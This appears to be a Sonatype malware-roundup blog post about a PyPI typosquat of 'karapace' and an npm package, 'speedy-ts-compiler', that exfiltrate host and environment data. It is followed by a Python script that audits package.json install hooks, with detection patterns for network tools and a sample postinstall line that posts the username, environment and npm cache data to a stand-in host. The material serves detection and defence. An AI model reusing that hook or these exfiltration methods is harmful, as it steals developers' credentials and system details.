This Week In Malware we pull apart a typosquat impersonating an Apache Kafka project and an interesting npm package that downloads another empty npm package—but turns out that’s merely a distraction technique.
We further review dependency confusion packages caught this week by Sonatype’s automated malware detection bots, offered as a part of the next-generation Nexus platform.
1. Apache Kafka copycat: ‘karapace’
First off, we have a PyPI package, ‘karapace’, assigned sonatype-2022-2696 in our security research data and analyzed by our senior security researcher Ankita Lamba.
The ‘karapace’ package on PyPI has exactly the same name as the karapace Python project on GitHub, which is “An open-source implementation of Kafka REST and Schema Registry.”
In the developer’s words, ‘karapace’ offers “Your Apache Kafka® essentials in one tool.” And the user squatting the same name on PyPI did not miss an opportunity to reuse the slogan:

But within the ‘karapace’ published to PyPI we see code that exfiltrates your IP address, environment variables, username, and other system fingerprinting information to a Pipedream address:

Considering the code contained within the package closely resembles several dependency confusion attacks we have seen thus far, this appears to be a PoC research package.
Out of caution, however, Sonatype reported the package to the PyPI security team and the package was taken down.
2. Exfiltration by distraction: npm package that downloads another empty package
On any given day, Sonatype’s security research team analyzes dozens to hundreds of suspicious packages published to open source registries including npm and PyPI.
But this one, “speedy-ts-compiler”, stood out to us. It is named after a hypothetical package used as an example in TypeStrong’s official docs and READMEs.

But the “speedy-ts-compiler” caught by us downloads an empty npm package, “tastytreats”, while simultaneously exfiltrating your IP address and username using the ‘npm get cache’ (Read more...)
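Both packages above do their work in install-time hooks, so a cheap first triage step is to audit a package's lifecycle scripts before anything runs. The following is an added example, not Sonatype's tooling or code from either package: it reads a package.json, looks only at the scripts npm executes during installation, and flags the behaviours described above (outbound URLs, `npm get cache` reads, environment dumps, username/host lookups). The pattern list and the sample package.json are constructed for illustration.

```python
import json
import re

# Lifecycle scripts that npm runs automatically on install, without user action.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicators of install-time fingerprinting/exfiltration (constructed, non-exhaustive).
SUSPICIOUS = {
    "network_tool": re.compile(r"\b(curl|wget|nc|ncat)\b"),
    "outbound_url": re.compile(r"https?://[^\s'\"]+"),
    "npm_config_read": re.compile(r"\bnpm\s+(get|config\s+get)\b"),
    "env_dump": re.compile(r"\b(env|printenv|os\.environ|process\.env)\b"),
    "user_or_host_lookup": re.compile(r"\b(whoami|hostname|os\.userInfo|os\.hostname)\b"),
}


def audit_package_json(text):
    """Return (hook, indicator) pairs for every install-time script that matches."""
    pkg = json.loads(text)
    findings = []
    for hook, cmd in pkg.get("scripts", {}).items():
        if hook not in INSTALL_HOOKS:
            continue  # 'test', 'build' etc. do not run during `npm install`
        for label, pattern in SUSPICIOUS.items():
            if pattern.search(cmd):
                findings.append((hook, label))
    return findings


# Constructed postinstall hook modelled on the behaviour described in the post:
# read npm config, collect username and environment, POST them to a remote host.
POSTINSTALL = (
    "node -e \"const os=require('os');"
    "require('https').request('https://collector.example.invalid/c',{method:'POST'})"
    ".end(JSON.stringify({u:os.userInfo().username,e:process.env,"
    "c:require('child_process').execSync('npm get cache').toString()}))\""
)
SAMPLE = json.dumps({
    "name": "example-pkg",
    "version": "1.0.0",
    "scripts": {"postinstall": POSTINSTALL, "test": "jest"},
})
CLEAN = json.dumps({"name": "clean-pkg", "version": "1.0.0",
                    "scripts": {"build": "tsc", "test": "jest"}})

if __name__ == "__main__":
    for hook, label in audit_package_json(SAMPLE):
        print(f"{hook}: {label}")
```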